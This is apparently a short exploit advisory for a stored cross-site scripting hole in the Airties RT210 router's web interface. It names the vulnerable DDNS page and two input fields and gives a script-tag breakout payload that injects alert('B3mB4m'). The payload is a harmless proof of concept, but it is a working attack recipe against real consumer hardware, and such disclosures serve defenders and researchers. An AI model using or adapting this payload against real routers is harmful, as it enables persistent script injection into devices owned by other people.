Airties RT210 suffers from a stored cross site scripting vulnerability.
58a70a1fdd8cd05e813fcfdc513bf69d6112dbebe921e9619fd08082d4ec7784
Airties RT210 Web Interface Stored XSS Vulnerability
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Discovered by: B3mB4m
[~] Contact : b3mb4m@gmail.com
[+] Greetz : SYS & & KnocKout & Septemb0x
############################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Hardware/Web App : Airties
|~Affected Version : AirRT210
|~Official Web: http://www.airties.com
|~RISK : Hight
----------------------------------------------------------
Proof video: https://www.youtube.com/watch?v=OOZwGeG8p3M
----------------------------------------------------------
Post
----------------------------------------------------------
Vul Link : http://192.168.2.1/ddns.stm
1) <input maxlength="49" size="50" name="ddns_domainame" value="">
2) <input maxlength="49" size="50" name="ddns_account" value="">
Payload : '"><SCrIpT>alert("B3mB4m")</ScRiPt>